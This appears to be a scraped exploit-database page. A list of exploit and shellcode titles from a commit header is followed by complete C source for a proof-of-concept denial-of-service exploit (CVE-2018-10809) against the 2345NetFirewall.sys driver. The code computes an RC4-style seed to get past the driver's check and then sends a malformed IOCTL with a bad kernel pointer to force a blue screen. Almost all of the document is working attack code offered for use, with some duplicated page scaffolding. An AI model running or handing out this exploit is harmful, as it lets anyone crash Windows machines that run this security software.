880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
182 lines
No EOL
3.9 KiB
C
182 lines
No EOL
3.9 KiB
C
/*
|
||
# Exploit Title: 2345 Security Guard 3.7 - Denial of Service
|
||
# Date: 2018-05-08
|
||
# Exploit Author: anhkgg
|
||
# Vendor Homepage: http://safe.2345.cc/
|
||
# Software Link: http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe
|
||
# Version: v3.7
|
||
# Tested on: Windows 7 x86
|
||
# CVE : CVE-2018-10809
|
||
#
|
||
# BSOD caused of 2345NetFirewall.sys because of not validating input values,test version 3.7 on windows 7 x86 platform
|
||
#
|
||
#
|
||
*/
|
||
|
||
#include <windows.h>
|
||
#include <stdio.h>
|
||
|
||
struct NETFW_IOCTL_ADD_PID
|
||
{
|
||
DWORD pid;
|
||
char seed[0x14];//
|
||
};//0x18
|
||
|
||
struct NETFW_IOCTL_SET_PID
|
||
{
|
||
BYTE set_state;//
|
||
BYTE unk;//1
|
||
WORD buf_len;//2
|
||
DWORD pid;//4
|
||
char buf[0x64];//8
|
||
};//6c
|
||
|
||
struct NETFW_IOCTL_222040
|
||
{
|
||
DWORD* ptr;
|
||
DWORD size;
|
||
};//
|
||
|
||
int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2)
|
||
{
|
||
int result;
|
||
|
||
*a1 ^= *a2;
|
||
*a2 ^= *a1;
|
||
result = (unsigned __int8)*a2;
|
||
*a1 ^= result;
|
||
return result;
|
||
}
|
||
|
||
int __stdcall sub_12A80(char *a1, int len, char *a3)
|
||
{
|
||
int result;
|
||
unsigned __int8 v4;
|
||
__int16 i;
|
||
__int16 j;
|
||
unsigned __int8 k;
|
||
|
||
for ( i = 0; i < 256; ++i )
|
||
a3[i] = i;
|
||
a3[256] = 0;
|
||
a3[257] = 0;
|
||
k = 0;
|
||
v4 = 0;
|
||
result = 0;
|
||
for ( j = 0; j < 256; ++j )
|
||
{
|
||
v4 += a3[j] + a1[k];
|
||
f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]);
|
||
result = (k + 1) / len;
|
||
k = (k + 1) % len;
|
||
}
|
||
return result;
|
||
}
|
||
|
||
char *__stdcall sub_12B60(char *a1, signed int len, char *a3)
|
||
{
|
||
char *result;
|
||
__int16 i;
|
||
unsigned __int8 v5;
|
||
unsigned __int8 v6;
|
||
|
||
v5 = a3[256];
|
||
v6 = a3[257];
|
||
for ( i = 0; i < len; ++i )
|
||
{
|
||
v6 += a3[++v5];
|
||
f_XOR__12A30((BYTE*)&a3[v5], (BYTE*)&a3[v6]);
|
||
a1[i] ^= a3[(unsigned __int8)(a3[v6] + a3[v5])];
|
||
}
|
||
a3[256] = v5;
|
||
result = a3;
|
||
a3[257] = v6;
|
||
return result;
|
||
}
|
||
|
||
void calc_seed(char* seed, char* dst)
|
||
{
|
||
char Source1[26] = {0};
|
||
char a3[300] = {0};
|
||
|
||
Source1[0] = 8;
|
||
Source1[1] = 14;
|
||
Source1[2] = 8;
|
||
Source1[3] = 10;
|
||
Source1[4] = 2;
|
||
Source1[5] = 3;
|
||
Source1[6] = 29;
|
||
Source1[7] = 23;
|
||
Source1[8] = 13;
|
||
Source1[9] = 3;
|
||
Source1[10] = 15;
|
||
Source1[11] = 22;
|
||
Source1[12] = 15;
|
||
Source1[13] = 7;
|
||
Source1[14] = 91;
|
||
Source1[15] = 4;
|
||
Source1[16] = 18;
|
||
Source1[17] = 26;
|
||
Source1[18] = 26;
|
||
Source1[19] = 3;
|
||
Source1[20] = 4;
|
||
Source1[21] = 1;
|
||
Source1[22] = 15;
|
||
Source1[23] = 25;
|
||
Source1[24] = 10;
|
||
Source1[25] = 13;
|
||
|
||
sub_12A80(seed, 0x14, a3);
|
||
sub_12B60(Source1, 0x1A, a3);
|
||
memcpy(dst, Source1, 26);
|
||
}
|
||
|
||
int poc_2345NetFirewall()
|
||
{
|
||
HANDLE h = CreateFileA("\\\\.\\2345NetFirewall",
|
||
GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,
|
||
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||
if(h == INVALID_HANDLE_VALUE) {
|
||
printf("[-] Open device error: %d\n", GetLastError());
|
||
return 1;
|
||
}
|
||
DWORD BytesReturned = 0;
|
||
|
||
DWORD ctlcode = 0x222298;
|
||
NETFW_IOCTL_ADD_PID add_pid = {0};
|
||
add_pid.pid = GetCurrentProcessId();
|
||
|
||
if(!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) {
|
||
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
|
||
}
|
||
|
||
ctlcode = 0x2222A4;
|
||
NETFW_IOCTL_SET_PID set_pid = {0};
|
||
set_pid.pid = GetCurrentProcessId();
|
||
set_pid.set_state = 1;
|
||
|
||
calc_seed(add_pid.seed, set_pid.buf);
|
||
set_pid.buf_len = 26;
|
||
|
||
if(!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) {
|
||
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
|
||
}
|
||
|
||
//BSOD
|
||
ctlcode = 0x222040;
|
||
NETFW_IOCTL_222040 buf_222040 = {0};
|
||
buf_222040.size = 1;
|
||
buf_222040.ptr = (DWORD*)0x80000000;
|
||
if(!DeviceIoControl(h, ctlcode, &buf_222040, sizeof(NETFW_IOCTL_222040), &buf_222040, sizeof(NETFW_IOCTL_222040), &BytesReturned, NULL)) {
|
||
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
|
||
}
|
||
|
||
return 0;
|
||
}
|
||
|
||
int main()
|
||
{
|
||
poc_2345NetFirewall();
|
||
|
||
return 0;
|
||
} |